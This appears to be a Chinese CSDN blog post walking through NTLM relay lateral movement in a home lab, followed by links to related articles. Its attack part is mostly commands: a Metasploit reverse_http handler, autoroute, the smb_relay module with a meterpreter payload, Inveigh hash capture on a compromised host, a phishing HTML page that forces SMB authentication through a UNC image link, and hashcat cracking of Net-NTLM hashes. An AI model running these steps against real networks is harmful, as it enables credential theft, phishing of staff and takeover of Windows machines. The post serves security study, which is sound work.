内网渗透之横向移动NTMLRelay(中继)攻击-Inveigh&NTLM-Relay重放

最新推荐文章于 2024-07-20 22:16:05 发布
最新推荐文章于 2024-07-20 22:16:05 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: 内网渗透 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/130455768
版权

横向移动 NTLM中继攻击 Relay重放(smb)

适用于无法获取hash或密码时使用
NTML Relay重放包括smb to relay ldap ews
webserver:
执行下面的命令时会默认以当前用户名和密码去登录目标计算机

dir \\ 192.168.3.32\c$

在这里插入图片描述
webserver切换到本地的administrator时

dir \\ 192.168.3.32\c$

在这里插入图片描述
出现这种现象的原因是webserver和sqlserver的本地管理员的密码是一样的,所以能登录成功,weadmin在sqlserver是没有登录的,当前没有这个用户所以匹配肯定失败,默认以当前用户尝试登录的

环境:
god.org
条件:双方用户名密码一致
1.cs转发至msf
cs:

spawn liandong   #监听器的名字

msf
监听上线:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8000
run

在这里插入图片描述
2.添加路由:

run post/multi/manage/autoroute

3.进行smb重放攻击
注意如果要使用administrator尝试登录的话,如果当前权限是system,可以使用msf或cs进行降权,ps migrate pid(adminstrator运行的id)

use exploit/windows/smb/smb_relay
set smbhost 192.168.3.32                                         #要攻击的地址
set lhost 192.168.85.129 
set autorunscript post/windows/manage/migrate
set payload windows/meterpreter/bind_tcp                       #64位没成功
set rhost 192.168.3.32                                         
run

webserver操作,注意这里要用aminsitrator用户

 dir \\192.168.85.129\c$`

成功上线
在这里插入图片描述
kali相当于中间人,利用webserver发送的账号密码去连接sqlserver

横向移动 NTLM中继攻击 Inveigh嗅探 Hash破解

条件:被控主机当前管理员权限
Responder中继攻击-NTLM Hash破解
1、监听拦截
放在websever上
Inveigh.exe
获取到的是NET NTLM HASH V1或V2
此hash是挑战hash,是不能直接用来hash传递攻击的
在这里插入图片描述
在但前文件会生成hash的一个txt文件
在这里插入图片描述
2、触发拦截
需要有请求的动作,不需要非得访问webserver,只要有用户名和密码验证就能抓到

dir \\192.168.3.32\c$

钓鱼触发
发邮件给内网其他主机
http://192.168.3.31/1.html
1.html

<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <img src="file:///\\192.168.3.32\2">
</body>
</html>

3、kali的hashcat 破解密文

hashcat -m 5600 hash1 pass2.txt 
hashcat -m 5600 hash1 pass2.txt  --show

在这里插入图片描述
hashcat可能会报错,包处理器内存不够
需要修改为单核单处理器,并把内存调到4g,注意关机操作
在这里插入图片描述

hashcat报错

mushangqiujin
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透(六十二)之 NTLM Realy 攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
05-02 915
NTLM Realy 攻击其实应该称为Net-NTLM Realy 攻击,它发生在NTLM认证的第三步,在Response 消息中存在Net-NTLM Hash,当攻击者获得了 Net-NTLM Hash 后,可以重放Net-NTLM Hash 进行中间人攻击NTLM Realy 流程如图所示,攻击者作为中间人在客户端和服务器之间转发NTLM认证数据包,从而模拟客户端身份访问服务端的资源。NTLM Relay 攻击分为两步:第一步是捕获 Net-NTLM Hash;
2021-10-15NTLM中继攻击ntlm delay)
qq_45290991的博客
10-15 2346
终于结束了,虽然没有毕业后成为一名red进入鹅产,但是到了小产业也感觉很好。齐名虽然年轻,但是朝气蓬勃。 我觉得同事都很开心,搞渗透测试运维也不错驻场。 一、原理 1.1ntlm认证机制 参考资料:Windows本地认证和NTLM认证 总的来说就是windows下有2种认证机制,kerb和ntlmntlm又分为第一版本和第二版本),kb用于域内,一般是kb优先用,不行了域内才会开始用ntlm。win2000以后,ntlm认证方式的hash(密码)都会被存入到SAM文件中,域内会存入ntdl。tdl
【内网安全】横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews
今天是几号的博客
04-02 1014
攻击者伪造一个恶意的SMB服务器,当内网中有机器Client1(webserver)访问这个攻击者精心构造好的SMB服务器时, smbrelayx.py 脚本将抓到 Client1 的 Net-NTLM Hash ,然后 smbrelayx.py 用抓取到的 Client1 的 Net-NTLM Hash 重放给 Client2(sqlserver)。Exchange,LLMNR投毒,
一文带你了解NTLM Realy 攻击
2401_85027424的博客
06-19 787
NTLM Realy 攻击其实应该称为Net-NTLM Realy 攻击,它发生在NTLM认证的第三步,在Response 消息中存在Net-NTLM Hash,当攻击者获得了 Net-NTLM Hash 后,可以重放Net-NTLM Hash 进行中间人攻击NTLM Realy 流程如图所示,攻击者作为中间人在客户端和服务器之间转发NTLM认证数据包,从而模拟客户端身份访问服务端的资源。NTLM Relay 攻击分为两步:第一步是捕获 Net-NTLM Hash;
NTLM/smb 中继攻击
灰太的表格的博客
10-19 1256
NTLM/smb 中继攻击
NTLM-relay攻击
good good study
03-07 1962
在上一篇笔记中,介绍了ntlm网络认证的原理 ——> NTLM网络认证协议分析及Net-NTLMhash的获取,我们获取了Net-NTLMhash值,但是我们爆破不出密码,可以使用NTLM-relay攻击relay就是中继的意思。 NTLM Relay原理 在Client视角下,Attacker是它的服务端,模拟客户端完成访问请求。 在Server视角下,Attacker是它的客户端,伪造客户端完成身份验证。 攻击者所做的事情只是把所有客户端的请求relay到服务端,并把所有服务端.
Inveigh:Windows PowerShell ADIDNSLLMNRmDNSNBNS spoofermachine-in-the-middle工具
05-12
Inveigh是PowerShell ADIDNS / LLMNR / NBNS / mDNS / DNS欺骗者和中间人工具,旨在帮助发现自己仅限于Windows系统的渗透测试人员/红色团队使用。 C#版本 1.4发布博客 维基 包括在 PowerShell帝国-https: PS>攻击...
Inveigh, 在中间工具中,Inveigh是一个 Windows PowerShell LLMNR/mDNS/NBNS spoofer/person.zip
09-18
Inveigh, 在中间工具中,Inveigh是一个 Windows PowerShell LLMNR/mDNS/NBNS spoofer/person InveighInveigh是一个用于帮助渗透测试人员/red teamers,发现自己局限于一个 Windows 系统的工具。维基...
浅析域内NTLM Relay攻击
2401_84466229的博客
05-27 887
NTLM Relay是一种中间人攻击的方式,一般而言都是被动攻击,等待连接操作,但PetitPotam的出现,发生了一些改变。正如上面实验,在两台域控都安装了ADCS的情况下,不需要被动等待即可发起攻击网络安全学习资源分享:给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料,朋友们如果有需要。
域渗透之中继攻击
蚁景网安学院
07-18 739
NTLM hashNTLMhash通常是指Windows系统下SecurityAccount Manager中保存的用户密码hash。通常Mimikatz是通过读取lsass.exe进程...
内网横向移动—Kerberos攻击&SPN扫描&WinRM&WinRS&RDP
剁椒鱼头没剁椒的博客
07-24 1041
文章中很多的环境,由于都是自己搭建的,有时候可能会出现无法测试成功的情况,有人问为什么不使用别人搭建好的靶场,主要是懒,不过最关键的是,这些环境太大了,自己的小破机器带不动呀。同时后面的文章很多之前介绍过的操作方式,我就会直接说,而不会像之前一样,一步一步操作,就比如我要设置socks代理,我就只会说,这里需要设置socks代理,而不会在去一步步演示socks代理如何设置。
域渗透|NTLM 中继攻击
weixin_42282189的博客
09-21 882
作者: r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 进入内网之后想获取运维人员(特定人员)的系统密码,在已经获得内网Linux或者代理隧道的前提下利用社会工程学或者水坑攻击的方式来获取特定机器的权限。 0x02 协议 1、NTLMHash:将明文口令转换成十六进制,转换成Unicode格式,然后对Unicode字符串进行MD4加密,这个结果就是32位的十六进制NTLMhash。 2、NTLM协议认证过程 1、客户端向服务器发送包含 “登录名”的请.
利用PetitPotam进行NTLM Relay攻击
谢公子的博客
09-18 6193
2021年7月19日,法国安全研究人员Gilles Lionel披露了一种新型的NTLM Relay攻击利用手法——PetitPotam。该漏洞利用了微软加密文件系统远程协议(MS-EFSRPC,MicroSoftEncrypting File System Remote Protocol)。MS-EFSRPC是 Microsoft 的加密文件系统远程协议,用于对远程存储和通过网络访问的加密数据执行“维护和管理操作”。利用该漏洞,黑客通过连接到LSARPC强制触发目标机器向指定远程服务器发送Net-NTL.
内网安全-横向移动-NTLM中继攻击
最新发布
weixin_63920195的博客
07-20 354
这两个是用在mimicatz获取明文hash失效的情况。
内网安全:NTLM-Relay
qq_61553520的博客
01-28 1711
NTLM Hash,直接PTH;没有NTLM Hash,尝试抓取Net NTLM Hash,暴力破解明文密码,中继攻击
Chapter 1 Securing Your Server and Network(10):使用扩展保护避免授权中继攻击
MVP黄钊吉(發糞塗牆)
08-04 4740
在客户端和服务器互访过程中,授权是会一直保持,通过验证,可以接受或拒绝连接。
内网渗透测试:NTLM Relay攻击分析
whatday的专栏
07-31 6623
目录 基础知识 NTLM认证过程 NTLM中继攻击原理 获得Net-NTLM Relay的思路 利用LLMNR和NetBIOS欺骗获得Net-NTLMHash 利用WPAD劫持获得Net-NTLMHash SMB Relay(SMB中继攻击 攻击演示 Responder中的MultiRelayx.py Impacket中的smbrelayx.py Metasploit中的smb_relay模块(ms08-068) Impcaket中的ntlmrelayx.py Ending...
SMB中继——内网渗透
include_voidmain的博客
04-26 3315
0x01 SMB协议 SMB概述: SMB(ServerMessage Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。 SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。 SMB使用了NetBIOS的应用程序接口 (ApplicationProgram Interface,简称API),一般端口使用为139,4
[内网渗透]—NTLM网络认证及NTLM-Relay攻击
Sentiment的博客
12-16 1582
Windows认证分为本地认证和网络认证,当我们开机登录用户账户时,就需要将lsass.exe进程转换的明文密码hash与 sam文件进行比对,这种方式即为——本地认证而当我们访问同一局域网的一台主机上的SMB共享时,需要提供凭证通过验证才能访问,这个过程就会设计windows的网络认证。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值